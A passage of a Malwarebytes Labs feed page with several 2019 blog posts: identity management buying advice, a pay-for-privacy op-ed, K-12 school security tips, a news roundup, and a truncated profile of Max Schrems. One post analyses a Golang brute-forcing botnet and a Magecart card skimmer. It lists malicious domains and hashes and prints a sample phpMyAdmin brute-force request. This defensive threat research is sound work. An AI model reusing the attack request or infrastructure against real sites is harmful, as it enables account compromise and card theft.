Techie Feeds

Key considerations for building vs. buying identity access management solutions

Malwarebytes - Thu, 02/28/2019 - 16:00

Time and time again, organizations learn the hard way that no matter which security solutions they have in place, if they haven’t properly secured the end user, their efforts can be easily rendered moot.

The classic slip-up most often associated with end-user-turned-insider-threat is falling for a phishing email that in turn infects the endpoint. Now imagine that end user is someone with access to highly-sensitive information.

In a recently released report, Forrester noted that 80 percent of data breaches are related to compromised privileged credentials, highlighting the need for secure identity and access management (IAM).

IAM is a framework of policies and technologies that ensure that the proper people in an enterprise have the appropriate access to resources. Identity and access management products provide IT managers with the tools necessary to control user access to critical information within an organization, whether that’s employees or customers. IAM tools help define and manage the roles and access privileges of individual network users, as well as the circumstances in which users are granted (or denied) those privileges.

Therefore, having a strong identity and access management solution is critical to the security of your organization. It ensures that the right people have access to your system—and keeps unauthorized users out.

When it comes to an IAM solution, organizations have two basic options: build it or buy it. How do you know which option is the right one for your business? Here are the factors you need to consider.

Risk mitigation

When deciding between building and buying an access management solution, the first step is to assess the company’s cybersecurity needs and potential risks. A good question to ask is: What’s at stake if your organization is compromised or breached? Are you in a field that regularly manages private or sensitive proprietary data, such as genetic research or wealth portfolio management? Do you store large databases of customers’ personally identifiable information (PII)? Consider what the consequences would be if an unauthorized person gained access to your system.

Once you’ve assessed the company’s risk, consider whether your development team could build in the security safeguards needed to manage those risks. If you have especially complex or demanding security needs, building the necessary protections into your existing system will be more difficult.

If your in-house engineering team does not have security experience, consider partnering with third parties for security testing, audits, and other services. Having a trusted third party look at your system can help ensure your security measures are sufficient.

Another factor to consider is whether you partner with any other third parties, such as software-as-a-service providers, that enable features within your system. If so, you’ll need to assess the security aspects of these third parties as well and whether they could better integrate with a homemade or other third-party solution.

Capabilities and available resources

Even if your development staff is skilled, keep in mind that building an access management solution requires a specific skill set. Evaluate the skills, knowledge, and background of your current team members and consider whether you would need to hire additional staff to complete the build.

Building your own solution will also take a considerable amount of time. Do you have enough development resources for this project? Even if you do, think about whether building an IAM solution is the most high-value task your team could be working on. There may be other more profitable projects you may want to prioritize, especially because so many pre-built solutions are available.

Remember, too, that building your solution won’t be a one-time investment. You’ll also have to dedicate time and resources to maintaining and updating your system.

The best option for your organization depends in part on which resource you have more of—time or money. If you have funding but not time, a pre-built solution is likely best. If your situation is reversed, building your own solution may save you money, providing you have the capabilities needed to build an adequate program.

Complexity of the solution

The complexity of the solution you need will also influence whether or not it’s possible to build your own with the resources and capabilities you have. If you only have one or two simple applications and a small number of users, you may be able to build a system on your own relatively easily.

If, however, your system includes large numbers of applications and users with a wide range of necessary privileges, building and maintaining an access management solution will be more challenging.

Also, consider the potential that your company might expand the number of applications or users in the near future. Is your company likely to grow substantially within the next few years? If it does, can your custom-built solution scale? Can a third-party solution do the same?

Third-party verification needs

Another consideration is the possible need for third-party verification, industry standards compliance, and regulatory compliance. You might be subject to certain rules based on your sector, location, or the type of data you handle. Ensuring you comply with these requirements adds an extra layer of complication to building or buying a solution.

Pre-built systems, however, may already comply with the necessary standards. Make sure you have a thorough understanding of all compliance requirements that impact you before you begin building a solution or looking for one to purchase.

Time-to-market needs

How quickly does your access management solution need to be up and running? If it’s a matter of security, that timeframe might be significantly shorter.

Building an access management solution is a time-intensive process, so if you need your solution to be ready quickly, this is not the best option. Purchasing a pre-built solution will enable you to roll out your new access management solution much more quickly than building one on your own would.

To build or to buy

Your identity and access management solution will be an important component for the security and accessibility of your system, both for employees and customers. It’s crucial that you employ a solution that adequately meets your organization’s needs. That’s why choosing between building and buying an access management solution is such an important decision.

To ensure you choose the right option, make sure you ask the right questions when evaluating the needs of your organization.

The post Key considerations for building vs. buying identity access management solutions appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Will pay-for-privacy be the new normal?

Malwarebytes - Wed, 02/27/2019 - 17:04

Privacy is a human right, and online privacy should be no exception.

Yet, as the US considers new laws to protect individuals’ online data, at least two proposals—one statewide law that can still be amended and one federal draft bill that has yet to be introduced—include an unwelcome bargain: exchanging money for privacy.

This framework, sometimes called “pay-for-privacy,” is plain wrong. It casts privacy as a commodity that individuals with the means can easily purchase. But a move in this direction could further deepen the separation between socioeconomic classes. The “haves” can operate online free from prying eyes. But the “have nots” must forfeit that right.

Though this framework has been used by at least one major telecommunications company before, and there are no laws preventing its practice today, those in cybersecurity and the broader technology industry must put a stop to it. Before pay-for-privacy becomes law, privacy as a right should become industry practice.

Data privacy laws prove popular, but flawed

Last year, the European Union put into effect one of the most sweeping set of data privacy laws in the world. The General Data Protection Regulation, or GDPR, regulates how companies collect, store, share, and use EU citizens’ data. The law has inspired countries everywhere to follow suit, with Italy (an EU member) issuing regulatory fines against Facebook, Brazil passing a new data-protective bill, and Chile amending its constitution to include data protection rights.

The US is no exception to this ripple effect.

In the past year, Senators Ron Wyden of Oregon, Marco Rubio of Florida, Amy Klobuchar of Minnesota, and Brian Schatz, joined by 14 other senators as co-sponsors, of Hawaii, proposed separate federal bills to regulate how companies collect, use, and protect Americans’ data.

Sen. Rubio’s bill asks the Federal Trade Commission to write its own set of rules, which Congress would then vote on two years later. Sen. Klobuchar’s bill would require companies to write clear terms of service agreements and to send users notifications about privacy violations within 72 hours. Sen. Schatz’s bill introduces the idea that companies have a “duty to care” for consumers’ data by providing a “reasonable” level of security.

But it is Sen. Wyden’s bill, the Consumer Data Protection Act, that stands out, and not for good reason. Hidden among several privacy-forward provisions, like stronger enforcement authority for the FTC and mandatory privacy reports for companies of a certain size, is a dangerous pay-for-privacy stipulation.

According to the Consumer Data Protection Act, companies that require user consent for their services could charge users a fee if those users have opted out of online tracking.

If passed, here’s how the Consumer Data Protection Act would work:

Say a user, Alice, no longer feels comfortable having companies collect, share, and sell her personal information to third parties for the purpose of targeted ads and increased corporate revenue. First, Alice would register with the Federal Trade Commission’s “Do Not Track” website, where she would choose to opt-out of online tracking. Then, online companies with which Alice interacts would be required to check Alice’s “Do Not Track” status.

If a company sees that Alice has opted out of online tracking, that company is barred from sharing her information with third parties and from following her online to build and sell a profile of her Internet activity. Companies that are run almost entirely on user data—including Facebook, Amazon, Google, Uber, Fitbit, Spotify, and Tinder—would need to heed users’ individual decisions. However, those same companies could present Alice with a difficult choice: She can continue to use their services, free of online tracking, so long as she pays a price.

This represents a literal price for privacy.

Electronic Frontier Foundation Senior Staff Attorney Adam Schwartz said his organization strongly opposes pay-for-privacy systems.

“People should be able to not just opt out, but not be opted in, to corporate surveillance,” Schwartz said. “Also, when they choose to maintain their privacy, they shouldn’t have to pay a higher price.”

Pay-for-privacy schemes can come in two varieties: individuals can be asked to pay more for more privacy, or they can pay a lower (discounted) amount and be given less privacy. Both options, Schwartz said, incentivize people not to exercise their privacy rights, either because the cost is too high or because the monetary gain is too appealing.

Both options also harm low-income communities, Schwartz said.

“Poor people are more likely to be coerced into giving up their privacy because they need the money,” Schwartz said. “We could be heading into a world of the ‘privacy-haves’ and ‘have-nots’ that conforms to current economic statuses. It’s hard enough for low-income individuals to live in California with its high cost-of-living. This would only further aggravate the quality of life.”

Unfortunately, a pay-for-privacy provision is also included in the California Consumer Privacy Act, which the state passed last year. Though the law includes a “non-discrimination” clause meant to prevent just this type of practice, it also includes an exemption that allows companies to provide users with “incentives” to still collect and sell personal information.

In a larger blog about ways to improve the law, which was then a bill, Schwartz and other EFF attorneys wrote:

“For example, if a service costs money, and a user of this service refuses to consent to collection and sale of their data, then the service may charge them more than it charges users that do consent.”

Real-world applications

The alarm for pay-for-privacy isn’t theoretical—it has been implemented in the past, and there is no law stopping companies from doing it again.

In 2015, AT&T offered broadband service for a $30-a-month discount if users agreed to have their Internet activity tracked. According to AT&T’s own words, that Internet activity included the “webpages you visit, the time you spend on each, the links or ads you see and follow, and the search terms you enter.”

Most of the time, paying for privacy isn’t always so obvious, with real dollars coming out or going into a user’s wallet or checking account. Instead, it happens behind the scenes, and it isn’t the user getting richer—it’s the companies.

Powered by mountains of user data for targeted ads, Google-parent Alphabet recorded $32.6 billion in advertising revenue in the last quarter of 2018 alone. In the same quarter, Twitter recorded $791 million in ad revenue. And, notable for its CEO’s insistence that the company does not sell user data, Facebook’s prior plans to do just that were revealed in documents posted this week. Signing up for these services may be “free,” but that’s only because the product isn’t the platform—it’s the user.

A handful of companies currently reject this approach, though, refusing to sell or monetize users’ private information.

In 2014, CREDO Mobile separated itself from AT&T by promising users that their privacy “is not for sale. Period.” (The company does admit in its privacy policy that it may “sell or trade mailing lists” containing users’ names and street addresses, though.) ProtonMail, an encrypted email service, positions itself as a foil to Gmail because it does not advertise on its site, and it promises that users’ encrypted emails will never be scanned, accessed, or read. In fact, the company claims it can’t access these emails even if it wanted.

As for Google’s very first product—online search— the clearest privacy alternative is DuckDuckGo. The privacy-focused service does not track users’ searches, and it does not build individualized profiles of its users to deliver unique results.

Even without monetizing users’ data, DuckDuckGo has been profitable since 2014, said community manager Daniel Davis.

“At DuckDuckGo, we’ve been able to do this with ads based on context (individual search queries) rather than personalization.”

Davis said that DuckDuckGo’s decisions are steered by a long-held belief that privacy is a fundamental right. “When it comes to the online world,” Davis said, “things should be no different, and privacy by default should be the norm.”

It is time other companies follow suit, Davis said.

“Control of one’s own data should not come at a price, so it’s essential that [the] industry works harder to develop business models that don’t make privacy a luxury,” Davis said. “We’re proof this is possible.”

Hopefully, other companies are listening, because it shouldn’t matter whether pay-for-privacy is codified into law—it should never be accepted as an industry practice.

The post Will pay-for-privacy be the new normal? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Golang brute forcer discovered amid rise in e-commerce attacks

Malwarebytes - Tue, 02/26/2019 - 16:00

E-commerce websites continue to be targeted by online criminals looking to steal personal and payment information directly from unaware shoppers. Recently, attacks have been conducted via skimmer, which is a piece of code that is either directly injected into a hacked site or referenced externally. Its purpose is to watch for user input, in particular around online shopping carts, and send the perpetrators that data, such as credit card numbers and passwords, in clear text.

Compromising e-commerce sites can be achieved in more than one way. Vulnerabilities in popular Content Management Systems (CMSes) like Magento, as well as in various plugins are commonly exploited these days. But because many website owners still use weak passwords, brute force attacks where multiple logins are attempted are still a viable option.

Our investigation started following the discovery of many Magento websites that were newly infected. We pivoted on the domain name used by the skimmer and found a connection to a new piece of malware that turned out to be a brute forcer for Magento, phpMyAdmin, and cPanel. While we can’t ascertain for sure whether this is how the skimmer was injected, we believe this may be one of many campaigns currently going after e-commerce sites.

Compromised website

The malicious code was found injected directly into the site’s homepage, referencing an external piece of JavaScript. This means that the shopping site had been compromised either via a vulnerability or by brute forcing the administrator password.

The online store is running the Magento CMS and using the OneStepCheckout library to process customers’ shopping carts. As the victim enters their address and payment details, their data is exfiltrated via a POST request with the information in Base64 format to googletagmanager[.]eu. This domain has been flagged before as part of criminal activities related to the Magecart threat groups.

Using VirusTotal Graph, we found a connection between this e-commerce site and a piece of malware written in Golang, more specifically a network query from the piece of malware to the compromised website. Expanding on it, we saw that the malware was dropped by yet another binary written in Delphi. Perhaps more interestingly, this opened up another large set of domains with which the malware communicates.

Payload analysis Delphi downloader

The first part is a downloader we detect as Trojan.WallyShack that has two layers of packing. The first layer is UPX. After unpacking it with the default UPX, we get the second layer: an underground packer using process hollowing.

The downloader is pretty simple. First, it collects some basic information about the system, and then it beacons to the C2. We can see that the domain names for the panels are hardcoded in the binary:

The main goal of this element is to download and run a payload file:

Golang payload

Here the dropped payload installs itself in the Startup folder, by first dumping a bash script in %TEMP%, which is then deployed under the Startup folder. The sample is not packed, and looking inside, we can find artifacts indicating that it was written in Golang version 1.9. We detect this file as Trojan.StealthWorker.GO.

The procedure of reversing will be similar to what we have done before with another Golang sample. Looking at the functions with prefix “main_”,  we can distinguish the functions that were part of the analyzed binary, rather than part of statically-linked libraries.

We found several functions with the name “Brut,” suggesting this piece of malware is dedicated to brute forcing.

This is the malware sample that communicated with the aforementioned compromised e-commerce site. In the following section, we will review how communication and tasks are implemented.

Bot communication and brute forcing

Upon execution, the Golang binary will connect to 5.45.69[.]149. Checking that IP address, we can indeed see a web panel:

The bot proceeds to report the infected computer is ready for a new task via a series of HTTP requests announcing itself and then receiving instructions. You can see below how the bot will attempt to brute force Magento sites leveraging the /downloader/directory point of entry:

Brute force attacks can be quite slow given the number of possible password combinations. For this reason, criminals usually leverage CMS or plugin vulnerabilities instead, as they provide a much faster return on investment. Having said that, using a botnet to perform login attempts allows threat actors to distribute the load onto a large number of workers. Given that many people are still using weak passwords for authentication, brute forcing can still be an effective method to compromise websites.

Attack timeframe and other connections

We found many different variants of that Golang sample, the majority of them first seen in VirusTotal in early February (hashes available in the IOCs section below).

Checking on some of these other samples, we noticed that there’s more than just Magento brute forcing. Indeed, some bots are instead going after WordPress sites, for example. Whenever the bot checks back with the server, it will receive a new set of domains and passwords. Here’s an example of brute forcing phpMyAdmin:

POST: set_session=&pma_username=Root&pma_password=Administ..&server=1&target= index.php&token= User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0

As we were investigating this campaign, we saw a tweet by Willem de Groot noting a recent increase in skimmers related to googletagmanager[.]eutied to Adminer, a database management utility. The shopping site on which we started our research was compromised only a few days ago. Without server logs and the ability to perform a forensic investigation, we can only assume it was hacked in one of many possible scenarios, including the Adminer/MySQL flaw or brute forcing the password.

Multiple weaknesses

There are many different weaknesses in this ecosystem that can be exploited. From website owners not being diligent with security updates or their passwords, to end users running infected computers turned into bots and unknowingly helping to hack web portals.

As always, it is important to keep web server software up-to-date and augment this protection by using a web application firewall to fend off new attacks. There are different methods to thwart brute force attacks, including the use of the .htaccess file to restrict which IP address is allowed to log in.

Skimmers are a real problem for online shoppers who are becoming more and more wary of entering their personal information into e-commerce websites. While victims may not know where and when theft happened, it does not bode well for online merchants when their platform has been compromised.

Malwarebytes detects the malware used in these attacks and blocks the skimmer gate.

With additional contributions from @hasherezade.

Indicators of Compromise (IOCs)

Skimmer domain


Delphi downloader


Delphi C2

snaphyteplieldup[.]xyz tolmets[.]info serversoftwarebase[.]com

Golang bruteforcer


Similar Golang bruteforcers

46fd1e8d08d06cdb9d91e2fe19a1173821dffa051315626162e9d4b38223bd4a 05073af551fd4064cced8a8b13a4491125b3cd1f08defe3d3970b8211c46e6b2 fdc3e15d2bc80b092f69f89329ff34b7b828be976e5cbe41e3c5720f7896c140 96a5b2a8fdc28b560f92937720ad0dcc5c30c705e4ce88e3f82c2a5d3ad085aa 81bd819f0feead6f7c76da3554c7669fbc294f5654a8870969eadc9700497b82 5e7581e3c8e913fe22d56a3b4b168fd5a9f3f8d9e0d2f8934f68e31a23feabd5 d87b4979c26939f0750991d331896a3a043ecd340940feb5ac6ec5a29ec7b797 36d62acd7aba4923ed71bfd4d2971f9d0f54e9445692b639175c23ff7588f0a7 7db29216bcb30307641b607577ded4a6ede08626c4fa4c29379bc36965061f62 4e18c0b316279a0a9c4d27ba785f29f4798b9bbebb43ea14ec0753574f40a54f 91a696d1a0ef2819b2ebb7664e79fa9a8e3d877bedcb5e99f05b1dc898625ed5 8b1b2dee404f274e90bd87ff6983d2162abee16c4d9868a10b802bd9bcbdbec6 046c5b18ec037ec5fbdd9be3e6ee433df3e4d2987ee59702b52d40e7f278154d 6b79345a2016b2822fd7f7bed51025b848b37e026d4638af59547e67078c913e 181ebf89a32a37752e0fc96e6020aa7af6dbb00ddb7ba02133e3804ac4d33f43 5efd1a27717d3e41281c08f8c048523e43b95300fb6023d34cb757e020f2ff7f 5dccce9b5611781c0edee4fae015119b49ce9eb99ee779e161ec0e75c1c383da

C2 server


The post New Golang brute forcer discovered amid rise in e-commerce attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

What K–12 schools need to shore up cybersecurity

Malwarebytes - Tue, 02/26/2019 - 13:00

Crumbling infrastructure. Gaps in curriculum. Antiquated devices. Difficult COPPA laws. Lack of funding. Those are just a few of the obstacles facing K–12 schools looking to adopt technology into their 21st century learning initiatives.

Now add security concerns to the list, and you can see why many schools struggle not only to keep up with consumer technology trends, but also protect against threats that target them.

Despite the uphill battle, schools know the importance of securing their students’ data, and many have found ways to safely incorporate cybersecurity awareness, as well as affordable technologies, to protect that data. We talked with members of the school board, administrators, educators, and security directors to discuss the cybersecurity challenges specific to K–12 schools (both private and public), and what can be done to overcome.

The challenges

In our 2019 State of Malware report, we found education to be consistently in the top 10 industries targeted by cybercriminals. However, when we zoomed in to look at the major threats that dominated in 2018, including information-stealing Trojans and more sophisticated ransomware attacks, schools were even higher on the list, ranking as number one and number two, respectively.

In addition to K–12 school systems, key academic services, such as the SAT and ACT, are susceptible to data breaches, which can undermine the legitimacy of the college admissions process.

US schools are data-rich targets for cybercriminals, including the names, Social Security Numbers, and email addresses of students, their academic and health records, financial information, and more. According to EdWeek, US K–12 schools have experienced 425 publicly-reported cybersecurity incidents since January 2016; the real number is likely much higher.

Digging into this data, presented on an interactive map from the K–12 Cybersecurity Resource Center (pictured below), schools were most impacted by data breaches (purple flags), phishing attacks (blue), and ransomware infections (yellow).

Map courtesy of the K–12 Cybersecurity Resource Center

Knowing they’re a target for threat actors, which major hurdles must schools jump over in order to shore up their cybersecurity?

The first is lack of professional development. Teachers, administrators, and support staff have access to highly-confidential student data that is housed online, and because they don’t know enough about cybersecurity, they can inadvertently allow for a breach. Yet, professional development is nearly always related to changes in curriculum adoption, school events, and the occasional technology training course on how to use a particular software program or Internet-connected classroom device, such as a smart board.

In a related issue, while students are typically far more tech-savvy than their teachers, they are often not taught fundamental cybersecurity awareness at home.

“We might assume that when students get devices from home, such as phones or tables, there are restrictions put in place or guidelines given, but very often, there are not,” said Tami Espinosa, Principal of Luigi Aprea Elementary School in Gilroy, CA. “We need to be sure to address how to properly use technology, because it is and will be such an integral part of their lives.”

Even if filters or other restrictions are put in place, many students are able to find ways around them, compromising security in the process. If they knew their actions could lead to their student records being accessed and changed, would they be so reckless?

Another challenge for shoring up cybersecurity in K–12 is a lack of funding. In a nutshell, there is none—or at least very little. What is available is usually applied directly to instruction and curriculum, as many in the school community don’t support diverting funds away from core subject areas.

“Cybersecurity isn’t a tangible item that directly impacts instruction, so many staff and community members wouldn’t support money going towards it, especially when facilities need to be fixed, curriculum needs to be purchased, and more support staff is needed,” said Tami Ortiz, a San Francisco Bay Area educator. “Cybersecurity is vital, but invisible.”

In fact, because the district or federal funding often doesn’t come through for cybersecurity, schools looking for funds often have to apply for grants or host fundraising events to subsidize.

Finally, updating infrastructure is a massive obstacle for schools hoping to tighten up security. Pubic schools especially struggle in this area, as it’s expensive to overhaul hardware every few years and requires support staff that can manage and secure not only the devices, but also any data stored on premise or in the cloud. From operating systems to specialized educational software that needs updating, vulnerabilities are rampant and can be easily exploited—and that’s without including negligent staff who might open an unwanted email and infect their machine.

The solutions

To help persuade community members and staff to divert funds, the severity of the situation must be impressed upon them. According to The 2018 State of K–12 Cybersecurity report, nearly half of the reported breaches of the year were caused by students and staff, and 60 percent of them resulted in student data being compromised.

This tells us that awareness is a key factor in combatting breaches, but also that technologies must be deployed in order to safeguard from tech-savvy students looking to get around the protections put in place.

Doron Aronson, Vice President of the Cambrian School Board of Trustees, said that with their limited budgets, school boards look at technology holistically, with security being an important component. There are three main areas they consider when making funding decisions: infrastructure, hardware, and security; instructional practices and professional learning; and digital curriculum, tools, data and assessment. And while security is mentioned only as part of infrastructure, it can actually be incorporated into all three areas. Here’s how:

Infrastructure, hardware, and security 

One of the “easiest” ways that schools can combat data breaches and other cyberattacks is by selecting and deploying cybersecurity solutions that combat threats which have historically targeted schools. IT directors should look for programs with dynamic, behavior-based detection criteria that shield from ransomware, Trojans, and other active malware families. Firewalls, supplementary email security, and encrypted data storage/backup systems provide additional coverage against breaches, phishing, and ransomware attacks.

In addition, developing a cybersecurity policy and incident response plan will help prepare schools in the event of a breach. Bonus points for incorporating a layer of security with top remediation capabilities, so that the aftermath, including restoring backups and cleaning up computers, is relatively painless.

Instructional practices and professional learning

Convince leadership to provide outsourced IT and security services, especially for professional development. Start by partnering outsider trainers with those who know the most—the IT/tech department—and then move on to administration, staff, paraprofessionals, and aides.

Fresno-based educational consultant Alex Chavez advises schools to “get serious about security. Put it on the leadership meeting agenda next to school site safety. Collaborate with the outsourced security to keep up-to-date with the latest threats and best practices.”

If funding for outside awareness training is non-existent, designate or ask for a volunteer to be the cyber coordinator for the school. Look to your community for volunteers: tech-savvy younger teachers, or parents who work in technology or security would be a good place to start.

“Get some trusted outside help,” said John Donovan, Head of Security at Malwarebytes. “Designate someone on your staff to be an internal leader/point of contact, and give them some time and incentives to learn and bring that info to your school—especially if it’s a volunteer position.”

Do the same within your student body. Designate a classroom cyberhero, or select a few older students to be the cyber police for the school. Reward with extra credit, less homework, or a points system within the school for getting swag.

Once staff and volunteers have had some initial training, broaden that training out to the wider school and community by offering both formal and informal lessons, including assembly talks and workshops, and occasionally testing that knowledge through simple, fun exercises.

Digital curriculum, tools, data, and assessment

Putting the infrastructure in place, including the right antivirus software, cybersecurity policies, and support staff (volunteer or professional), plus providing professional development are steps in the right direction to shoring up cybersecurity in our elementary, middle, and high schools. However, perhaps the most important step is knowing what to teach students and teachers alike about cybersecurity hygiene, and how best to teach it.

“My advice would be to make sure there is a plan in place for the intentional teaching of cyber safety,” said Espinosa. “So often we think a lot of this is common sense, however, it is not.”

To that end, we suggest the following best practices, especially relevant to those in education:

  • Install security software on all endpoints in the school environment, including mobile devices teachers may use to check their emails during the day.
  • Beware of phishing emails and other social engineering, such as technical support scams or video game games, aimed at both teachers and students. Look at the sender’s email address and be hyper aware if there are attachments or links within the body of the email asking for personal information.
  • Student data should be backed up and encrypted end-to-end in storage and in transmission.
  • Use or create digital curriculum that is COPPA compliant.
  • Use password managers for any teacher, administrator, or even student accounts.
  • Keep all software and hardware updated regularly. Systems and software that have reached end of life (EOL) and are no longer supported with security updates should be purged and replaced.
How to teach it
  • Incorporate cybersecurity hygiene into digital citizenship discussions, as well as digital literacy learning.
  • Make cybersecurity part of curriculum that aligns to state standards for ELA or even math by assimilating knowledge about threats, hackers, or other online dangers into reading comprehension instruction, word problems, or even project-based learning activities.
  • Create gamified lessons, such as phishing tests.
  • Offer rewards for good cybersecurity hygiene, such as stars or points for logging out of accounts before closing browsers.
  • Assign cybersecurity as a research topic for reports.

Engaging students in cybersecurity: a primer for educators
Malwarebytes Labs

Stop, Think, Connect
US Department of Homeland Security

Stay Safe Online/National Cyber Security Awareness Month
National Cyber Security Alliance

Privacy and Internet Safety
Common Sense Media

Framework for Improving Critical Infrastructure Cybersecurity
National Institute of Standards and Technology

The post What K–12 schools need to shore up cybersecurity appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (February 18 – 24)

Malwarebytes - Mon, 02/25/2019 - 16:52

Last week on Malwarebytes Labs, we explored the world of crack hunting, gave you a 101 on the world of bots and their threats and advantages, and took a look at some clever phishing scams. We also explained how a Mac fends off malware, posted a handy “lazy person’s guide to cybersecurity,” and dug into some APT action.

Other security news
  • YouTube ran into major problems, specifically, a network of pedophiles. (Source: Wired)
  • Facebook improved location settings: Android users will now find they possess greater control over which information is shared with Facebook. (Source: Facebook)
  • Big extortion, big money: Research reveals “salaries” of up to a quarter of a million dollars in return for getting up to dubious antics online. (Source: The Register)
  • Flaw, blimey: A 19-year-old WinRAR bug was discovered. (Source: CheckPoint)
  • Political infighting leads to data blowout: It’s all very exciting over in the UK, as a major political party reported a former member for alleged breach-related activity. (Source: The Guardian)
  • Collection leaks and compromised passwords: How to steer clear of trouble related to the ongoing “Collection” dumps. (Source: Help Net Security)
  • An egg in this trying time: A malware campaign offers up an eggy attack targeting job seekers. (Source: Proofpoint)
  • ATM hacking: A look at how easy ATM shenanigans has become. (Source: Wired)
  • BabyShark phishing: Yes, it’s a spear phishing campaign called BabyShark. (Source: ZDNet)
  • Wi-Fi and social engineering: A look at some of the most common social engineering tricks deployed against networks. (Source: Security Boulevard)

Stay safe, everyone!

The post A week in security (February 18 – 24) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Max Schrems: lawyer, regulator, international man of privacy

Malwarebytes - Mon, 02/25/2019 - 16:00

Almost one decade ago, disparate efforts began in the European Union to change the way the world thinks about online privacy.

One effort focused on legislation, pulling together lawmakers from 28 member-states to discuss, draft, and deploy a sweeping set of provisions that, today, has altered how almost every single international company handles users’ personal information. The finalized law of that effort—the General Data Protection Regulation (GDPR)—aims to protect the names, addresses, locations, credit card numbers, IP addresses, and even, depending on context, hair color, of EU citizens, whether they’re customers, employees, or employers of global organizations.

The second effort focused on litigation and public activism, sparking a movement that has raised at least nearly half a million dollars to fund consumer-focused lawsuits meant to uphold the privacy rights of EU citizens, and has resulted in the successful dismantling of a 15-year-old intercontinental data-transfer agreement for its failure to protect EU citizens’ personal data. The 2015 ruling sent shockwaves through the security world, and forced companies everywhere to scramble to comply with a regulatory system thrown into flux.

The law was passed. The movement is working. And while countless individuals launched investigations, filed lawsuits, participated in years-long negotiations, published recommendations, proposed regulations, and secured parliamentary approval, we can trace these disparate yet related efforts back to one man—Maximilian Schrems.

Remarkably, as the two efforts progressed separately, they began to inform one another. Today, they work in tandem to protect online privacy. And businesses around the world have taken notice.

The impact of GDPR today

A Portuguese hospital, a German online chat platform, and a Canadian political consultancy all face GDPR-related fines issued last year. In January, France’s National Data Protection Commission (CNIL) hit Google with a 50-million-euros penalty—the largest GDPR fine to date—after an investigation found a “lack of transparency, inadequate information and lack of valid consent regarding the ads personalization.”

The investigation began, CNIL said, after it received legal complaints from two groups: the nonprofit La Quadrature du Net and the non-governmental organization None of Your Business. None of Your Business, or noyb for short, counts Schrems as its honorary director. In fact, he helped crowdfund its launch last year.

Outside the European Union, lawmakers are watching these one-two punches as a source of inspiration.

When testifying before Congress about a scandal involving misused personal data, the 2016 US presidential election, and a global disinformation campaign, Facebook CEO Mark Zuckerberg repeatedly heard calls to regulate his company and its data-mining operations.

“The question is no longer whether we need a federal law to protect consumers privacy,” said Republican Senator John Thune of South Dakota. “The question is what shape will that law take.”

Democratic Senator Mark Warner of Virginia put it differently: “The era of the Wild West in social media is coming to an end.”

A new sheriff comes to town

In 2011, Schrems was a 23-year-old law student from Vienna, Austria, visiting the US to study abroad. He enrolled in a privacy seminar at the Santa Clara University School of Law where, along with roughly 22 other students, he learned about online privacy law from one of the field’s notable titans.

Professor Dorothy Glancy practiced privacy law before it had anything to do with the Internet, cell phones, or Facebook. Instead, she navigated the world of government surveillance, wiretaps, and domestic spying. She served as privacy counsel to one of the many subcommittees that investigated the Watergate conspiracy.

Later, still working for the subcommittee, she examined the number of federal agency databases that contained people’s personally identifiable information. She then helped draft the Privacy Act of 1974, which restricted how federal agencies collected, used, and shared that information. It is one of the first US federal privacy laws.

The concept of privacy has evolved since those earlier days, Glancy said. It is no longer solely about privacy from the government. It is also about privacy from corporations.

“Over time, it’s clear that what was, in the 70s, a privacy problem in regards to Big Brother and the federal government, has now gotten so that a lot of these issues have to do with the private [non-governmental] collection of information on people,” Glancy said.

In 2011, one of the biggest private, non-governmental collectors of that information was Facebook. So, when Glancy’s class received a guest presentation from Facebook privacy lawyer Ed Palmieri, Schrems paid close attention, and he didn’t like what he heard.

For starters, Facebook simply refused to heed Europe’s data privacy laws.

Speaking to 60 Minutes, Schrems said: “It was obviously the case that ignoring European privacy laws was the much cheaper option. The maximum penalty, for example, in Austria, was 20,000 euros. So, just a lawyer telling you how to comply with the law was more expensive than breaking it.”

Further, according to Glancy, Palmieri’s presentation showed that Facebook had “absolutely no understanding” about the relationship between an individual’s privacy and their personal information. This blind spot concerned Schrems to no end. (Palmieri could not be reached for comment.)

“There was no understanding at all about what privacy is in the sense of the relationship to personal information, or to human rights issues,” Glancy said. “Max couldn’t quite believe it. He didn’t quite believe that Facebook just didn’t understand.”

So Schrems investigated. (Schrems did not respond to multiple interview requests and he did not respond to an interview request forwarded by his colleagues at Noyb.)

Upon returning to Austria, Schrems decided to figure out just how much information Facebook had on him. The answer was astonishing: Facebook sent Schrems a 1,200-page PDF that detailed his location history, his contact information, information about past events he attended, and his private Facebook messages, including some he thought he had deleted.

Shocked, Schrems started a privacy advocacy group called “Europe v. Facebook” and uploaded redacted versions of his own documents onto the group’s website. The revelations touched a public nerve—roughly 40,000 Europeans soon asked Facebook for their own personal dossiers.

Schrems then went legal. With Facebook’s international headquarters in Ireland, he filed 22 complaints with Ireland’s Data Protection Commissioner, alleging that Facebook was violating EU data privacy law. Among the allegations: Facebook didn’t really “delete” posts that users chose to delete, Facebook’s privacy policy was too vague and unclear to constitute meaningful consent by users, and Facebook engaged in illegal “excessive processing” of user data.

The Irish Data Protection Commissioner rolled Schrems’ complaints into an already-running audit into Facebook, and, in December 2011, released non-binding guidance for the company. Facebook’s lawyers also met with Schrems in Vienna for six hours in February 2012.

And then, according to Schrems’ website, only silence and inaction from both Facebook and the Irish Data Protection Commissioner’s Office followed. There were no meaningful changes from the company. And no stronger enforcement from the government.

Frustrating as it may have been, Schrems kept pressing. Luckily, according to Glancy, he was just the right man for the job.

“He is innately curious,” Glancy said. “Once he sees something that doesn’t quite seem right, he follows it up to the very end.”

Safe Harbor? More like safety not guaranteed

On June 5, 2013, multiple newspapers exposed two massive surveillance programs in use by the US National Security Agency. One program, then called PRISM (now called Downstream), implicated some of the world’s largest technology companies, including Facebook.

Schrems responded by doing what he did best: He filed yet another complaint against Facebook—his 23rd—with the Irish Data Protection Commissioner. Facebook Ireland, Schrems claimed, was moving his data to Facebook Inc. in the US, where, according to The Guardian, the NSA enjoyed “mass access” to user data. Though Facebook and other companies denied their participation, Schrems doubted the accuracy of these statements.

“There is probable cause to believe that ‘Facebook Inc’ is granting the NSA mass access to its servers that goes beyond merely individual requests based on probable cause,” Schrems wrote in his complaint. “The statements by ‘Facebook Inc’ are in light of the US laws not credible, because ‘Facebook Inc’ is bound by so-called ‘gag orders.’”

